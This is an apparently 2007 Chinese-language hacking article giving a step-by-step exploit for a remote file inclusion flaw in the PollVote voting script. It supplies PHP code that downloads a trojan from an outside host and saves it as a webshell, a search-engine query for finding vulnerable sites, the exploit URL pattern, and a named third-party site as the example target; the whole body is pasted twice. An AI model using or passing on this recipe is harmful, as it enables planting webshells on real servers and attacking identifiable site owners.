PollVote投票系統(tǒng)漏洞利用
更新時間:2007年01月16日 00:00:00 作者:
PollVote是一個投票系統(tǒng),今天看了非安全的雜志,看了利用方法,
不過作者說利用過程的時候很煩瑣,關(guān)鍵的時候又沒說明白,
簡單的說一下``
首先建立2個文本 分別是creatfile.txt和phpdoor.txt
creatfile.txt內(nèi)容寫
<?
$f=file_get_contents("http://www.hackeroo.com/phpdoor.txt");
$ff=fopen("111.php","a");
fwrite ($ff,$f);
fclose($ff);
?>
phpdoor.txt內(nèi)容就寫個PHP木馬
之后在http://www.google.com 搜索關(guān)鍵詞"pollvote.php?pollname"
有很多,
搜索到一個http://www.skinnyturd.co.uk/poll/pollvote.php?pollname=Poll.cfg
就是他了
EXP是http://www.[host].com/[path]/pollvote.php?pollname=http://www.[host].com/CMD.gif?&cmd=ls
這個就是利用原理了,
剛才說到的creatfile.txt和phpdoor.txt這個2個文件都上傳到自己的空間里
執(zhí)行 http://www.skinnyturd.co.uk/poll ... o.com/creatfile.txt
這樣
phpdoor.txt里的內(nèi)容就會生成一個111.php
這樣我們就得到WEBSHELL了
http://www.skinnyturd.co.uk/poll/111.php
不過作者說利用過程的時候很煩瑣,關(guān)鍵的時候又沒說明白,
簡單的說一下``
首先建立2個文本 分別是creatfile.txt和phpdoor.txt
creatfile.txt內(nèi)容寫
<?
$f=file_get_contents("http://www.hackeroo.com/phpdoor.txt");
$ff=fopen("111.php","a");
fwrite ($ff,$f);
fclose($ff);
?>
phpdoor.txt內(nèi)容就寫個PHP木馬
之后在http://www.google.com 搜索關(guān)鍵詞"pollvote.php?pollname"
有很多,
搜索到一個http://www.skinnyturd.co.uk/poll/pollvote.php?pollname=Poll.cfg
就是他了
EXP是http://www.[host].com/[path]/pollvote.php?pollname=http://www.[host].com/CMD.gif?&cmd=ls
這個就是利用原理了,
剛才說到的creatfile.txt和phpdoor.txt這個2個文件都上傳到自己的空間里
執(zhí)行 http://www.skinnyturd.co.uk/poll ... o.com/creatfile.txt
這樣
phpdoor.txt里的內(nèi)容就會生成一個111.php
這樣我們就得到WEBSHELL了
http://www.skinnyturd.co.uk/poll/111.php
相關(guān)文章
焦點技術(shù):Google你真好(Google Hack)
焦點技術(shù):Google你真好(Google Hack)...2007-01-01
關(guān)于oblog、動易、風(fēng)訊等擁有源碼編輯的程序漏洞淺析
這篇文章主要介紹了關(guān)于oblog、動易、風(fēng)訊等擁有源碼編輯的程序漏洞淺析2007-01-01
AngelShell:讓所有正向程序?qū)崿F(xiàn)反向連接(應(yīng)用篇)
AngelShell:讓所有正向程序?qū)崿F(xiàn)反向連接(應(yīng)用篇)...2007-01-01
推薦:二次發(fā)現(xiàn)桃源網(wǎng)絡(luò)硬盤漏洞
推薦:二次發(fā)現(xiàn)桃源網(wǎng)絡(luò)硬盤漏洞...2007-01-01

